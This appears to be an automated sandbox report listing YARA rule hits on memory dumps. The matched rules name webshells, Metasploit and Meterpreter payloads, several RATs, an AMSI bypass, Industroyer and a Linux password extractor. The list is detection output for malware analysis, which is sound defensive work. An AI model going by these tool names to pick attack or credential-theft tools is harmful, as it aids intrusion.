Source: 00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = https://creativecommons.org/licenses/by-nc/4.0/, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_h6ss date = 2014/01/28, author = Florian Roth, description = Web Shell - file h6ss.php, score = 272dde9a4a7265d6c139287560328cd5
Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Fierce2 date = 01.07.2014, author = Florian Roth, description = This signature detects the Fierce2 domain scanner, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx description = Web Shell - from files Shell [ci
Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, hash = 6163b30600f1e80d2bb5afaa753490b6
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf date = 2017-02-09, hash1 = 320a01ec4e023fb5fbbaef963a2b57229e4f918847e5a49c7a3f631cb556e96c, author = Florian Roth, description = Metasploit Payloads - file msf.sh, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_2 date = 2017-02-09, hash1 = e52f98466b92ee9629d564453af6f27bd3645e00a9e2da518f5a64a33ccf8eb5, author = Florian Roth, description = Metasploit Payloads - file msf.asp, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_psh date = 2017-02-09, hash1 = 5cc6c7f1aa75df8979be4a16e36cece40340c6e192ce527771bdd6463253e46f, author = Florian Roth, description = Metasploit Payloads - file msf-psh.vba, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_exe date = 2017-02-09, hash1 = 321537007ea5052a43ffa46a6976075cee6a4902af0c98b9fd711b9f572c20fd, author = Florian Roth, description = Metasploit Payloads - file msf-exe.vba, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_3 date = 2017-02-09, hash1 = 335cfb85e11e7fb20cddc87e743b9e777dc4ab4e18a39c2a2da1aa61efdbd054, author = Florian Roth, description = Metasploit Payloads - file msf.psh, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_4 date = 2017-02-09, hash1 = 26b3e572ba1574164b76c6d5213ab02e4170168ae2bcd2f477f246d37dbe84ef, author = Florian Roth, description = Metasploit Payloads - file msf.aspx, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_exe_2 date = 2017-02-09, hash1 = 3a2f7a654c1100e64d8d3b4cd39165fba3b101bbcce6dd0f70dae863da338401, author = Florian Roth, description = Metasploit Payloads - file msf-exe.aspx, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_6 date = 2017-02-09, hash1 = 8d6f55c6715c4a2023087c3d0d7abfa21e31a629393e4dc179d31bb25b166b3f, author = Florian Roth, description = Metasploit Payloads - file msf.vbs, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_7 date = 2017-02-09, hash1 = 425beff61a01e2f60773be3fcb74bdfc7c66099fe40b9209745029b3c19b5f2f, author = Florian Roth, description = Metasploit Payloads - file msf.vba, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_8 date = 2017-02-09, hash1 = 519717e01f0cb3f460ef88cd70c3de8c7f00fb7c564260bd2908e97d11fde87f, author = Florian Roth, description = Metasploit Payloads - file msf.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_cmd date = 2017-02-09, hash1 = 9f41932afc9b6b4938ee7a2559067f4df34a5c8eae73558a3959dd677cb5867f, author = Florian Roth, description = Metasploit Payloads - file msf-cmd.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_11 date = 2017-02-09, hash1 = d1daf7bc41580322333a893133d103f7d67f5cd8a3e0f919471061d41cf710b6, author = Florian Roth, description = Metasploit Payloads - file msf.hta, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_ref date = 2017-02-09, hash1 = 4ec95724b4c2b6cb57d2c63332a1dd6d4a0101707f42e3d693c9aab19f6c9f87, author = Florian Roth, description = Metasploit Payloads - file msf-ref.ps1, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CVE_2017_8759_SOAP_Excel date = 2017-09-15, author = Florian Roth, description = Detects malicious files related to CVE-2017-8759, reference = https://twitter.com/buffaloverflow/status/908455053345869825, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_ISESteroids_Obfuscation date = 2017-06-23, author = Florian Roth, description = Detects PowerShell ISESteroids obfuscation, reference = https://twitter.com/danielhbohannon/status/877953970437844993, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Reflective_DLL_Loader_Aug17_1 date = 2017-08-20, hash1 = f2f85855914345eec629e6fc5333cf325a620531d1441313292924a88564e320, author = Florian Roth, description = Detects Reflective DLL Loader, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Reflective_DLL_Loader_Aug17_2 date = 2017-08-20, hash2 = b90831aaf8859e604283e5292158f08f100d4a2d4e1875ea1911750a6cb85fe0, author = Florian Roth, description = Detects Reflective DLL Loader - suspicious - Possible FP could be program crack, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score = c2a7a2d0b05ad42386a2bedb780205b7c0af76fe9ee3d47bbe217562f627fcae
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Reflective_DLL_Loader_Aug17_3 date = 2017-08-20, hash1 = d10e4b3f1d00f4da391ac03872204dc6551d867684e0af2a4ef52055e771f474, author = Florian Roth, description = Detects Reflective DLL Loader, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBScript_Favicon_File date = 2017-10-18, hash1 = 39c952c7e14b6be5a9cb1be3f05eafa22e1115806e927f4e2dc85d609bc0eb36, author = Florian Roth, description = VBScript cloaked as Favicon file used in Leviathan incident, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Backdoor_Redosdru_Jun17 date = 2017-06-04, hash1 = 4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309, author = Florian Roth, description = Detects malware Redosdru - file systemHome.exe, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HTA_with_WScript_Shell date = 2017-06-21, author = Florian Roth, description = Detects WScript Shell in HTA, reference = https://twitter.com/msftmmpc/status/877396932758560768, license = https://creativecommons.org/licenses/by-nc/4.0/, score = ca7b653cf41e980c44311b2cd701ed666f8c1dbc
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: HTA_Embedded date = 2017-06-21, author = Florian Roth, description = Detects an embedded HTA file, reference = https://twitter.com/msftmmpc/status/877396932758560768, license = https://creativecommons.org/licenses/by-nc/4.0/, score = ca7b653cf41e980c44311b2cd701ed666f8c1dbc
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: StoneDrill date = 2017-03-07, hash3 = 69530d78c86031ce32583c6800f5ffc629acacb18aac4c8bb5b0e915fc4cc4db, hash2 = 62aabce7a5741a9270cddac49cd1d715305c1d0505e620bbeaec6ff9b6fd0260, author = Florian Roth, description = Detects malware from StoneDrill threat report, reference = https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 2bab3716a1f19879ca2e6d98c518debb107e0ed8e1534241f7769193807aac83
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: StoneDrill_VBS_1 date = 2017-03-07, hash1 = 0f4d608a87e36cb0dbf1b2d176ecfcde837070a2b2a049d532d3d4226e0c9587, author = Florian Roth, description = Detects malware from StoneDrill threat report, reference = https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: EternalRocks_taskhost date = 2017-05-18, hash1 = cf8533849ee5e82023ad7adbdbd6543cb6db596c53048b1a0c00b3643a72db30, author = Florian Roth, description = Detects EternalRocks Malware - file taskhost.exe, reference = https://twitter.com/stamparm/status/864865144748298242, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: BeyondExec_RemoteAccess_Tool date = 2017-03-17, hash1 = 3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c, author = Florian Roth, description = Detects BeyondExec Remote Access Tool - file rexesvr.exe, reference = https://goo.gl/BvYurS, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Disclosed_0day_POCs_injector date = 2017-07-07, hash1 = ba0e2119b2a6bad612e86662b643a404426a07444d476472a71452b7e9f94041, author = Florian Roth, description = Detects POC code from disclosed 0day hacktool set, reference = Disclosed 0day Repos, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OilRig_Strings_Oct17 date = 2017-10-18, author = Florian Roth, description = Detects strings from OilRig malware and malicious scripts, reference = https://researchcenter.paloaltonetworks.com/2017/10/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Suspicious_Script_Running_from_HTTP author = Florian Roth, description = Detects a suspicious , reference = https://www.hybrid-analysis.com/sample/a112274e109c5819d54aa8de89b0e707b243f4929a83e77439e3ff01ed218a35?environmentId=100, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-20
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_dropper_script_Dec17_1 date = 2018-01-01, author = Florian Roth, description = Detects a supicious VBS script that drops an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Malware_1 date = 2017-06-13, hash2 = 018eb62e174efdcdb3af011d34b0bf2284ed1a803718fba6edffe5bc0b446b81, hash1 = ad23c7930dae02de1ea3c6836091b5fb3c62a89bf2bcfb83b4b39ede15904910, author = Florian Roth, description = Detects Industroyer related malware, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Portscan_3_Output date = 2017-06-13, author = Florian Roth, description = Detects Industroyer related custom port scaner output file, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Malware_4 date = 2017-06-13, hash1 = 21c1fdd6cfd8ec3ffe3e922f944424b543643dbdab99fa731556f8805b0d5561, author = Florian Roth, description = Detects Industroyer related malware, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Industroyer_Malware_5 date = 2017-06-13, hash1 = 7907dd95c1d36cf3dc842a1bd804f0db511a0f68f4b3d382c23a3c974a383cad, author = Florian Roth, description = Detects Industroyer related malware, reference = https://goo.gl/x81cSy, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: redSails_PY date = 2017-10-02, hash2 = 5ec20cb99030f48ba512cbc7998b943bebe49396b20cf578c26debbf14176e5e, hash1 = 6ebedff41992b9536fe9b1b704a29c8c1d1550b00e14055e3c6376f75e462661, author = Florian Roth, description = Detects Red Sails Hacktool - Python, reference = https://github.com/BeetleChunks/redsails, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Rehashed_RAT_2 date = 2017-09-08, hash1 = 49efab1dedc6fffe5a8f980688a5ebefce1be3d0d180d5dd035f02ce396c9966, author = Florian Roth, description = Detects malware from Rehashed RAT incident, reference = https://blog.fortinet.com/2017/09/05/rehashed-rat-used-in-apt-campaign-against-vietnamese-organizations, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Microcin_Sample_5 date = 2017-09-26, hash1 = b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e, author = Florian Roth, description = Malware sample mentioned in Microcin technical report by Kaspersky, reference = https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PS_AMSI_Bypass date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://gist.github.com/mattifestation/46d6a2ebb4a1f4f0e7229503dc012ef1, license = https://creativecommons.org/licenses/by-nc/4.0/, score = file
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: JS_Suspicious_Obfuscation_Dropbox date = 2017-07-19, author = Florian Roth, description = Detects PowerShell AMSI Bypass, reference = https://twitter.com/ItsReallyNick/status/887705105239343104, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: JS_Suspicious_MSHTA_Bypass date = 2017-07-19, author = Florian Roth, description = Detects MSHTA Bypass, reference = https://twitter.com/ItsReallyNick/status/887705105239343104, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: JavaScript_Run_Suspicious author = Florian Roth, description = Detects a suspicious Javascript Run command, reference = https://twitter.com/craiu/status/900314063560998912, license = https://creativecommons.org/licenses/by-nc/4.0/, score = 2017-08-23
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: FVEY_ShadowBroker_Auct_Dez16_Strings date = 2016-12-17, author = Florian Roth, description = String from the ShodowBroker Files Screenshots - Dec 2016, score = https://bit.no.com:43110/theshadowbrokers.bit/post/message6/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial_Payload_Spring1 date = 2017-02-04, hash5 = 95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1, hash4 = 5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c, hash3 = 8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8, hash2 = 9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a, hash1 = bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703, author = Florian Roth, description = Ysoserial Payloads - file Spring1.bin, hash7 = adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7, hash6 = 1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187, reference = https://github.com/frohoff/ysoserial, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial_Payload date = 2017-02-04, hash5 = 747ba6c6d88470e4d7c36107dfdff235f0ed492046c7ec8a8720d169f6d271f4, hash4 = 5c44482350f1c6d68749c8dec167660ca6427999c37bfebaa54f677345cdf63c, hash3 = 1da04d838141c64711d87695a4cdb4eedfd4a206cc80922a41cfc82df8e24187, hash2 = adf895fa95526c9ce48ec33297156dd69c3dbcdd2432000e61b2dd34ffc167c7, author = Florian Roth, description = Ysoserial Payloads, hash10 = 0143fee12fea5118be6dcbb862d8ba639790b7505eac00a9f1028481f874baa8, hash11 = 8cfa85c16d37fb2c38f277f39cafb6f0c0bd7ee62b14d53ad1dd9cb3f4b25dd8, hash12 = bf9b5f35bc1556d277853b71da24faf23cf9964d77245018a0fdf3359f3b1703, hash9 = 1fea8b54bb92249203d68d5564a01599b42b46fc3a828fe0423616ee2a2f2d99, hash8 = 95f966f2e8c5d0bcdfb34e603e3c0b911fa31fc960308e41fcd4459e4e07b4d1, hash7 = 5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56, hash6 = f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929, reference = https://github.com/frohoff/ysoserial, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = f756c88763d48cb8d99e26b4773eb03814d0bd9bd467cc743ebb1479b2c4073e, super_rule = 9c0be107d93096066e82a5404eb6829b1daa6aaa1a7b43bcda3ddac567ce715a
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Ysoserial_Payload_3 date = 2017-02-04, hash2 = 5466d47363e11cd1852807b57d26a828728b9d5a0389214181b966bd0d8d7e56, author = Florian Roth, description = Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin, reference = https://github.com/frohoff/ysoserial, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = f0d2f1095da0164c03a0e801bd50f2f06793fb77938e53b14b57fd690d036929
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CACTUSTORCH date = 2017-07-31, hash3 = a52d802e34ac9d7d3539019d284b04ded3b8e197d5e3b38ed61f523c3d68baa7, hash2 = 0305aa32d5f8484ca115bb4888880729af7f33ac99594ec1aa3c65644e544aea, hash1 = 314e6d7d863878b6dca46af165e7f08fedd42c054d7dc3828dc80b86a3a9b98c, author = Florian Roth, description = Detects CactusTorch Hacktool, reference = https://github.com/mdsecactivebreach/CACTUSTORCH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Quasar_RAT_2 date = 2017-04-07, hash3 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash2 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/, super_rule = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_Malware_2 date = 2017-04-03, hash1 = c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_Malware_3 date = 2017-04-03, hash1 = c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_Malware_5 date = 2017-04-03, hash1 = beb1bc03bb0fba7b0624f8b2330226f8a7da6344afd68c5bc526f9d43838ef01, author = Florian Roth, description = Detects malware from Operation Cloud Hopper, reference = https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: OpCloudHopper_WmiDLL_inMemory date = 2017-04-07, author = Florian Roth, description = Malware related to Operation Cloud Hopper - Page 25, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: VBS_WMIExec_Tool_Apr17_1 date = 2017-04-07, hash1 = 21bc328ed8ae81151e7537c27c0d6df6d47ba8909aebd61333e32155d01f3b11, author = Florian Roth, description = Tools related to Operation Cloud Hopper, reference = https://github.com/maaaaz/impacket-examples-windows, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, modified = 2020-07-27
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimipenguin_SH date = 2017-04-01, author = Florian Roth, description = Detects Mimipenguin Password Extractor - Linux, reference = https://github.com/huntergregal/mimipenguin, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000003.305199649.00000000050F1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: POSHSPY_Malware date = 2017-07-15, author = Florian Roth, description = Detects, reference = https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html, license = https://creativecommons.org/licenses/by-nc/4.0/
